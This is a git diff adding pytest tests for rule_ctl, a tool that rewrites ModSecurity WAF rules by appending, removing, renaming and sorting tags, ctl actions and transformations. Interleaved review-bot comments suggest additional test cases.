test_replace_action_with_duplicate_action(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def 
test_replace_action_with_different_name(self): + arguments = [ + "--replace-action", "msg:foo,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + arguments = [ + "--replace-action", "deny,msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:foo,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_without_values(self): + arguments = [ + "--replace-action", "pass,deny", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + pass,\\ + msg:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + msg:'abc'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_for_any_value(self): + arguments = [ + "--replace-action", "msg,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:bar,\\ + msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_quotes(self): + arguments = [ + "--replace-action", "msg,msg:'bar'", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:something,\\ + msg:'or',\\ + msg:other" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + msg:'bar',\\ + 
msg:'bar',\\ + msg:'bar'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_with_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_replace_action_skip_chain(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + msg:'abc',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_ctl_test.py b/util/rule_ctl/tests/rule_ctl_ctl_test.py new file mode 100644 index 0000000000..efcf905262 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_ctl_test.py 
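Review bot: `test_replace_action_with_different_name` runs two independent scenarios (`msg:foo,deny` and `deny,msg:foo`) in one method, so a failure in the first assertion hides whether the second case works and the report shows a single failure for two behaviors; split it into two test methods, e.g. `test_replace_action_value_with_flag` and `test_replace_flag_with_action_value`. None of the cases in this file exercise the `--filter-rule-id` guard at the top of `SecAction.modify`; a test with a non-matching filter asserting `rule_string == get_output(context)` would pin that rules outside the filter are left untouched.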
@@ -0,0 +1,125 @@ +from .helpers import * + +class TestAppendControl: + def test_append_ctl_with_no_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_existing_ctls(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:username,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_ctl_with_duplicate_ctl(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_ctl_in_correct_order(self): + arguments = [ + "--append-ctl", "ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ver:3" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + sanitiseMatchedBytes,\\ + ctl:ruleRemoveTargetById=1234;ARGS:passwd,\\ + ver:3" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_ignores_ctl_prefix(self): + arguments = [ + 
"--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_with_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" "ctl:ruleRemoveTargetById=1234;ARGS:passwd" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_ctl_skip_chain(self): + arguments = [ + "--append-ctl", "ctl:ruleRemoveTargetById=1234;ARGS:passwd", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_tags_test.py b/util/rule_ctl/tests/rule_ctl_tags_test.py new file mode 100644 index 0000000000..a65e66ef93 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_tags_test.py 
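Review bot: Every `--append-ctl` case uses the same value `ruleRemoveTargetById=1234;ARGS:passwd`, and the expected output shows it written unquoted (`id:12,ctl:ruleRemoveTargetById=1234;ARGS:passwd`), whereas the tag tests in this commit render `--append-tag foo` as `tag:'foo'`; no case pins what happens to a ctl value containing a character the action list itself uses, such as a comma or a single quote, so whether the tool quotes it, rejects it, or emits a rule ModSecurity will parse differently is untested. One case with such a value and an explicit expected string (or an expected error) would close that gap; the right expectation depends on the tool, so I am not asserting which. Separately, `from .helpers import *` hides where `create_context` and `get_output` come from; `from .helpers import create_context, get_output` would make it explicit, and the same applies to rule_ctl_tags_test.py, rule_ctl_test.py, rule_ctl_transformations_test.py and rule_ctl_variables_test.py in this commit.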
@@ -0,0 +1,395 @@ +from .helpers import * + +class TestAppendTag: + def test_append_tag_with_no_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_existing_tags(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'abc',\\ + tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tag_with_duplicate_tag(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo',\\ + tag:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_tag_in_correct_order(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_with_chain(self): + arguments = [ + "--append-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" 
\\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tag_skip_chain(self): + arguments = [ + "--append-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + log:'log',\\ + logdata:'data',\\ + tag:'foo',\\ + sanitiseArg:arg,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "deny" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTag: + def test_remove_tag_with_no_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_existing_tags(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tag_with_chain(self): + arguments = [ + "--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, 
rule_string) + assert expected == get_output(context) + + def test_remove_tag_skip_chain(self): + arguments = [ + "--remove-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRenameTag: + def test_rename_tag_with_no_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_rename_tag_with_existing_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_with_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'bar'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_skip_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + "--skip-chain" + ] + rule_string = 
""" +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestSortTags: + def test_sort_tags(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_with_chain(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_skip_chain(self): + arguments = [ + "--sort-tags", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ 
+ tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/util/rule_ctl/tests/rule_ctl_test.py b/util/rule_ctl/tests/rule_ctl_test.py new file mode 100644 index 0000000000..f7114ceafa --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_test.py 
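Review bot: `--remove-tag` is only ever exercised against the unquoted spelling `tag:foo` (`test_remove_tag_with_existing_tags`, `test_remove_tag_with_chain`, `test_remove_tag_skip_chain`), while `--rename-tag` and the duplicate check in `test_append_tag_with_duplicate_tag` only see the single-quoted form `tag:'foo'`, so neither command is shown to handle the other spelling. If the real rule files use the quoted form, a remove case whose fixture carries `tag:'foo'` and an append-duplicate case against an unquoted `tag:foo` would pin both directions. `test_sort_tags` likewise uses only lowercase ASCII tags; one mixed-case fixture would document whether the ordering is byte-wise or case-insensitive.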
@@ -0,0 +1,195 @@ +from .helpers import * + +class TestFilterRuleId: + def test_filter_rule_id_exact_match(self): + arguments = [ + "--filter-rule-id", "12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_prefix_match(self): + arguments = [ + "--filter-rule-id", "^12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_suffix_match(self): + arguments = [ + "--filter-rule-id", ".*22$", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_no_match(self): + arguments = [ + "--filter-rule-id", "11", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestLineNumbers: + def test_line_numbers_identical(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" + +SecRule ARGS "@rx bar" "id:13" +""" + expected = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" + +SecRule ARGS "@rx bar" "id:13,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def 
test_line_numbers_shifted_down(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_line_numbers_shifted_up(self): + arguments = [ + "--remove-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:foo" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestTargetFile: + def test_target_file(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--target-file", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) + + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() + + def test_target_file_uses_config_as_default(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--config", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) 
+ + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() diff --git a/util/rule_ctl/tests/rule_ctl_transformations_test.py b/util/rule_ctl/tests/rule_ctl_transformations_test.py new file mode 100644 index 0000000000..f1db898f10 --- /dev/null +++ b/util/rule_ctl/tests/rule_ctl_transformations_test.py 
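Review bot: `test_filter_rule_id_exact_match` does not establish exact matching: the filter `12` is applied only to a rule with `id:12`, and since `test_filter_rule_id_prefix_match` shows the argument is a regex (`^12` matching `id:122`), an unanchored `12` presumably also matches `id:122`, which no test checks. For a tool that rewrites WAF rules in place, a filter that matches more ids than intended silently edits unrelated rules, so a case with `"--filter-rule-id", "12"` against `id:122` asserting either no change (full match) or the edit (search) would pin the semantics and make the test name honest.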
@@ -0,0 +1,281 @@ +from .helpers import * + +class TestAppendTfunc: + def test_append_tfunc_with_no_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_existing_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_duplicate_transformation(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:lower,\\ + t:urlDecode" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_in_correct_order(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + log:'log',\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + t:lower,\\ + log:'log',\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_with_chain(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule 
ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_skip_chain(self): + arguments = [ + "--append-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTfunc: + def test_remove_tfunc_with_no_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tfunc_with_existing_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_with_multiple_args(self): + arguments = [ + "--remove-tfunc", "lower", + "--remove-tfunc", "decodeUrl" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + context = create_context(arguments, rule_string) + assert 
expected == get_output(context) + + def test_remove_tfunc_with_chain(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_skip_chain(self): + arguments = [ + "--remove-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" 